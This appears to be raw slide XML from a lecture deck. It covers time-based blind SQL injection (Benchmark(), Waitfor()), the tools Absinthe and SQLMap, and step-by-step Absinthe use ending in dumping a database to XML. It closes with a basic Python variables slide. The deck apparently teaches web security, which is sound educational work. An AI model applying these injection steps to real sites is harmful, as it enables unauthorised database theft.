              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> conditions may be how long the page takes to process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Use functions to insert time into a query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Benchmark()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using questions like, if the answer is true then use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>() to delay the response</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pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518160" y="1691640"/>
            <a:ext cx="8061960" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fewer tools work with blind SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some examples would be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Absinthe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Also works for "normal" SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SQLMap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sqlmap.sourceforge.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Part of w3af</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pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Absinthe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="106680" y="1676400"/>
            <a:ext cx="5410200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Written by  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Nummish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> and Xeron</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Available at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>https://github.com/HandsomeCam/Absinthe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is one of the first well-functioning tools to work against blind SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is a windows tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We mainly use it if our goal is to return large data sets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145412" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-12000" contrast="10000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5546408" y="1676400"/>
            <a:ext cx="3567112" cy="411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pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Absinthe in Use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="1737360"/>
            <a:ext cx="5410200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Select the database type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Enter the URL of the form action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Select the form method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Choose authentication (optional)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Enter the parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1066800" lvl="1" indent="-609600">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Select "Injectable Parameter" for the target parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Initialize the injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="146436" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-10000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576888" y="1676400"/>
            <a:ext cx="3567112" cy="411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6437" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8458200" y="1981200"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146438" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8534400" y="2514600"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146439" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7086600" y="3352800"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146440" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="2667000"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146441" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="4419600"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146442" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="5334000"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>6</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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Retrieving DB Schema </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350520" y="1722120"/>
            <a:ext cx="4572000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Now the attacker can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Retrieve the username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Retrieve the tables in the DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Map the fields in the tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Dump the entire dataset to XML files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="147460" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-10000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="2057400"/>
            <a:ext cx="3302000" cy="381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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Python Variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19458" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655320" y="1696085"/>
            <a:ext cx="7848600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Variables do not need to be declared and are loose typed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name = "Monty Python and the Holy Grail"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>year = 1975</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>movie = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print( name, year, movie )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Lists can be used to store arrays of variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>relics = ("Holy Grail", "Holy Hand Grenade of Antioch")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print( relics[0] )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:rPr>
